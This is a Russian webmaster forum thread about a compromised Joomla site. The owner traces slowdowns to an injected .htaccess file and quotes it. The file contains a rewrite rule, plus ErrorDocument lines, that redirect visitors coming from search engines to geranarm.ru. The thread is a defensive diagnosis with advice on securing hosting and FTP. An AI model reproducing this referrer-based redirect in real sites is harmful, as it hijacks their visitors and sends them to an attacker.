Куда копать - ломанули сайт?

12
S
На сайте с 22.05.2012
Offline
29
1494

Народ подскажите к в какую сторону копать. Молодой сайт работал довольно стабильно и быстро до прошлой недели. Никаких изменений не проводилось, но вдруг стал медленно загружаться.

Проанализировав скорость нагрузки получил, что сайт начал обращаться к "geranarm.ru который зареген 2012.05.19, а именно за "geranarm.ru/twittwp?3"" и ничего не получив в ответ (это время тормоза) сайт нормально загружается. Работает на Joomla 1.5.

В Базе поискал ничего не нашел закодировано?.... в домашнем каталоге в .htaccess

"ErrorDocument 401 geranarm.ru/twittwp?3

ErrorDocument 403 geranarm.ru/twittwp?3

ErrorDocument 404 geranarm.ru/twittwp?3

ErrorDocument 500 geranarm.ru/twittwp?3"

больше ничего... скорее всего закодировано в каком то скрипте?

Сайт могу скинуть в ЛС

Главный инструмент - голова
!B
На сайте с 16.08.2007
Offline
57
#1
seotoolby:
Народ подскажите к в какую сторону копать. Молодой сайт работал довольно стабильно и быстро до прошлой недели. Никаких изменений не проводилось, но вдруг стал медленно загружаться.

Проанализировав скорость нагрузки получил, что сайт начал обращаться к "geranarm.ru который зареген 2012.05.19, а именно за "geranarm.ru/twittwp?3"" и ничего не получив в ответ (это время тормоза) сайт нормально загружается. Работает на Joomla 1.5.

В Базе поискал ничего не нашел закодировано?.... в домашнем каталоге в .htaccess

"ErrorDocument 401 geranarm.ru/twittwp?3
ErrorDocument 403 geranarm.ru/twittwp?3
ErrorDocument 404 geranarm.ru/twittwp?3
ErrorDocument 500 geranarm.ru/twittwp?3"

больше ничего... скорее всего закодировано в каком то скрипте?

Сайт могу скинуть в ЛС

ищите код внутри страницы, это либо картинка с внешним урл, либо javascript, либо iframe

дальше ищите в шаблонах движка где это подключается

либо в ядре движка

если найдете файл измененный

посмотрите дату изменения, и по логам надо смотреть

S
На сайте с 22.05.2012
Offline
29
#2

Хоть убейте не могу найти.... Может кто глянет?

[Удален]
#3
!html.by:
ищите код внутри страницы, это либо картинка с внешним урл, либо javascript, либо iframe
дальше ищите в шаблонах движка где это подключается
либо в ядре движка

если найдете файл измененный
посмотрите дату изменения, и по логам надо смотреть

не найдешь по измененной дате. обычно проходятся тачем после редактинга.

тс - не сохраняй данные от фтп на компе.

L
На сайте с 15.01.2008
Offline
112
#4

Можно развернуть сайт на локалхосте и в Тотале Alt+F7 забить адрес этого сайта. Если адрес не закодирован - должно найти

S
На сайте с 22.05.2012
Offline
29
#5
lpcard:
Можно развернуть сайт на локалхосте и в Тотале Alt+F7 забить адрес этого сайта. Если адрес не закодирован - должно найти

В первом посте написал, что так и сделал.... причем думал найти составные части пробивал и "narm.ru" и ".ru".... безуспешно...

---------- Добавлено 31.05.2012 в 00:06 ----------

РЕШЕНО НАРОД!!! Все таки сам нашел... Каким то фигом в начальной папке (вне папок сайтов а в самой корневой) появилась .htaccess со следующим содержимым....

<IfModule mod_rewrite.c> ewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://geranarm.ru/twittwp?3 [R=301,L] </IfModule>

надо менять пароль к хостингу

!B
На сайте с 16.08.2007
Offline
57
#6
seotoolby:
В первом посте написал, что так и сделал.... причем думал найти составные части пробивал и "narm.ru" и ".ru".... безуспешно...

---------- Добавлено 31.05.2012 в 00:06 ----------

РЕШЕНО НАРОД!!! Все таки сам нашел... Каким то фигом в начальной папке (вне папок сайтов а в самой корневой) появилась .htaccess со следующим содержимым....

<IfModule mod_rewrite.c> ewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://geranarm.ru/twittwp?3 [R=301,L] </IfModule>

надо менять пароль к хостингу

все только начинается!

как туда файл попал? смените данные от ftp и не сохраняйте их в менеджерах

Dima Tuesday
На сайте с 18.02.2010
Offline
47
#7

Скорее всего причина возникновения файла:

seotoolby:
Работает на Joomla 1.5.
R
На сайте с 24.01.2008
Offline
180
#8

Вообще обновляйте паблик движки!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
S
На сайте с 22.05.2012
Offline
29
#9
Rxp:
Вообще обновляйте паблик движки!

здесь не в движке дело, а в хостинге... ломанули именно хостинг (там большое кол-во сайтов), ну а по поводу паблик-движкой это понятно...

---------- Добавлено 01.06.2012 в 12:15 ----------

Dima Tuesday:
Скорее всего причина возникновения файла:
на джумла создал более 50 сайтов... со всеми уязвимостями знком не по наслышке, сам SQL инъекции делал :)))

PS/ Всем откликнувшимся большое спасибо!

SK
На сайте с 06.02.2007
Offline
51
#10

Уж сколько раз твердили миру: .ftpaccess рулит!

ТС, настройте грамотно .ftpaccess и горя знать не будете - никто кроме вашего IP на хост зайти не сможет.

BIRTH : Completed successfully. Exit code 0. LIFE : [||||||..............] 37% done. DEATH : Awaiting in system queue...
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий